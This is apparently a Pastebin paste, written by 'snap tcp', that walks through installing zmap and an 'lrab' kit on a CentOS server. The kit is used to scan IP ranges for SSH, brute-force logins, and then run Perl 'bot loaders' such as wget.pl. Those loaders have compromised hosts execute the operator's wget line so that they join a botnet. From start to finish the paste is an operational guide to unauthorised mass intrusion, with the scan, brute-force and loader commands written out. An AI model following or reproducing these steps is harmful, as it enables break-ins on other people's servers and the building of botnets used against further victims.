Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ________ _____ _____ ______ _/ |_ __ ___/ |_
- \___ // \\__ \ \____ \ \ __\ | \ __\
- / /| Y Y \/ __ \| |_> > | | | | /| |
- /_____ \__|_| (____ / __/ |__| |____/ |__|
- \/ \/ \/|__|
- welcome to the zmap setup part of scanning by snap tcp :)
- this is for centOS 6 x64 or centOS 7 x64
- 1.so first log on to your scanning server and just type your user name and password
- 2.next type this command (yum update -y) this will update all your dependecies overall your server
- 3.next type these commands:
- yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y
- yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y
- yum install epel-release -y
- yum install gengetopt -y
- wget https://github.com/zmap/zmap/archive/v2.1.0.tar.gz
- tar -xvf v2.1.0.tar.gz
- cd zmap-2.1.0
- flex -o "src/lexer.c" --header-file="src/lexer.h" "src/lexer.l"
- byacc -d -o "src/parser.c" "src/parser.y"
- mkdir /etc/zmap
- cp conf/* /etc/zmap
- cmake -DENABLE_HARDENING=ON
- make
- make install
- cd
- 4.so once you get finished with that just type (clear) now its time setup lrab
- .__ ___. __ __
- | |____________ \_ |__ _/ |_ __ ___/ |_
- | |\_ __ \__ \ | __ \ \ __\ | \ __\
- | |_| | \// __ \| \_\ \ | | | | /| |
- |____/__| (____ /___ / |__| |____/ |__|
- \/ \/
- welcome to the lrab setup part of scanning by snap tcp :)
- this is on the same server u put zmap on so dont close it
- 1.open wnscp and login to your scanning server
- 2.next drag your lrab folder into wnscp
- 3.in your lrab file u should have these files
- -blackhat.pl (bot loader)
- -class
- -clean
- -cleanlist
- -dick
- -f1
- -f3
- -go
- -motd
- -pass_file
- -update
- -wget.pl (bot loader)
- 4.so now once you have lrab on to your server u should have zmap and lrab by typing ls
- 5.now type this command (cd LRAB) this will bring u into your lrab folder in your server
- 6.now type this commands:
- --------------------------------------------------------------------------------------------------
- Net:SSH2 Error fix:
- yum install gcc cpan php-pear php-devel libssh2 libssh2-devel -y
- pecl install -f ssh2 touch /etc/php.d/ssh2.ini echo
- extension=ssh2.so>/etc/php.d/ssh2.ini
- cpan -fi Net::SSH2
- cpan -fi Parallel::ForkManager
- --------------------------------------------------------------------------------------------------
- If u get CPAN Errors then do this:
- wget http://search.cpan.org/CPAN/authors/id/D/DL/DLUX/Parallel-ForkManager-0.7.5.tar.gz
- tar -xvf Para*
- cd Para*
- perl Makefile.PL
- make
- make install
- cd ../
- rm -rf Para*
- wget http://www.cpan.org/authors/id/S/SA/SALVA/Net-SSH2-0.59_23.tar.gz
- tar -xvf Net*
- cd Net*
- perl Makefile.PL
- make
- make install
- cd ../
- rm -rf Net*
- --------------------------------------------------------------------------------------------------
- 7.once you get done with that just type this command (chmod 777 *) this will give you premission to all the files in lrab,so every time you add a file to lrab through
- wnscp you gotta type that (chmod 777 *)
- 8.so now your lrab is now setup and ready to scan and brute force :)
- ________ _____ _____ ______ ______ ____ _____ ____ ____ |__| ____ ____ _/ |_ __ ___/ |_
- \___ // \\__ \ \____ \ / ___// ___\\__ \ / \ / \| |/ \ / ___\ \ __\ | \ __\
- / /| Y Y \/ __ \| |_> > \___ \\ \___ / __ \| | \ | \ | | \/ /_/ > | | | | /| |
- /_____ \__|_| (____ / __/ /____ >\___ >____ /___| /___| /__|___| /\___ / |__| |____/ |__|
- \/ \/ \/|__| \/ \/ \/ \/ \/ \//_____/
- welcome to the zmap scanning part of scanning made by snap tcp :)
- this is still on the same server :)
- 1.so fist type this command (cd) to cd back into root directory
- 2.now type this command (cd zmap-2.1.0) to go into zmap folder
- 3.now to scan a lst file just type this command (zmap -p22 -wssh.lst -oBIG.txt -T 2) note that u can change the name of your lst file that you have (ssh.lst is just example)
- 4.just wait till its over or stop when ever you feel like it by typing (ctrl+c)
- 5.next type this command to put all those ips into a mfu.txt byt typing this (cat BIG.txt | sort | uniq > mfu.txt)
- 6.now go to back into wnscp and go into to your zmap folder and drag the mfu.txt out of zmap by dragging it on top of the three little dots at the top,and then
- go out of zmap and now u should see the mfu.txt at the root directory and then you drag your mfu.txt into lrab and then after u do that go intp lrab folder and
- u should see the mfu.txt in there with all the the other files.
- 7.now go back to putty and type this command (cd) to go back to root directory
- 8.now type this command (cd LRAB) this will take u into lrab
- 9.now u need premission to get use the mfu.txt so type this command (chmod 777 *)
- 10.so now u need to brute force those ip's that in the mfu.txt so type this command (./update 15000 or 10000)
- 11.after its done or you decide to stop it just type this command (ctrl+c)
- 12.so if you go back to wnscp and you go into lrab folder and u click the little green refresh button u will see a vuln.txt
- 13.so after u see that click on the wget.pl or what ever bot loader u have in lrab and click edit
- 14.now find where it says this (( $channel->exec('link here'); )) so where it says link here paste your wget line there so bots will connect to your net
- 15.so after that just save that and go back to putty and make sure your still in the lrab folder and type this command (clear) and after that type this command
- (chmod 777 *) to gain premission form the vuln.txt,so now everything should be green if you type ls,then type (clear) again to have a clear screen.
- 16.so now u can scan those bots on to your net now.
- 17.type this command (perl wget.pl vuln.txt or what haver bot loader u have) once u do that they should be going on to your net if they dont then u forgot
- to add your wget line into your bot loader or your ssh.lst was bad and all the bots was dead or scanned already.but no worries ima show u how to scan your own ranges now with lrab.
- .__ ___. .__ __ __
- | |____________ \_ |__ ______ ____ _____ ____ ____ |__| ____ ____ _/ |_ __ ___/ |_
- | |\_ __ \__ \ | __ \ / ___// ___\\__ \ / \ / \| |/ \ / ___\ \ __\ | \ __\
- | |_| | \// __ \| \_\ \ \___ \\ \___ / __ \| | \ | \ | | \/ /_/ > | | | | /| |
- |____/__| (____ /___ / /____ >\___ >____ /___| /___| /__|___| /\___ / |__| |____/ |__|
- \/ \/ \/ \/ \/ \/ \/ \//_____/
- welcome to the lrab scanning part of scanning made by snap tcp :)
- this is still on the same server :)
- 1.so fist type this command (cd) to cd back into root directory
- 2.next type this command (cd LRAB) to go into your lrab folder on putty
- 3.next go into wnscp and go into your lrab folder and remove all the mfu.txt,and vuln.txt u have in their becuase we are making new ones.
- 4.so once that is done click on the dick file and click edit
- 5.now u change the ranges but typing public ranges or your own if u have some
- 6.now just save and exit once finished
- 7.now go back onto putty and type this command (./dick) this will start your range scanning.you can go for how ever long u want to,but once your feel like u want
- to stope type this command (ctrl+c)
- 8.now type (clear)
- 9.now u need to do this command (cat bios.txt | sort | uniq > mfu.txt) this will sort it back into a mfu.txt
- 10.now u need type (clear)
- 11.then type this command (chmod 777 *) to gain permission for the mfu.txt
- 12.now type this command to bruteforce those ips that u scanned with those ranges (./update 15000 or 10000)
- 13.once its finished just type (clear)
- 14.now type this command (chmod 777 *)
- 15.then u type this command (perl wget.pl vuln.txt or what ever bot loader u have) this will send the bots to your net
- -----------------------------------------------------------------------------------------------------------------------
- Every thing was wrote by snap tcp with courtesy or cia networking for the little help he gave me !!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement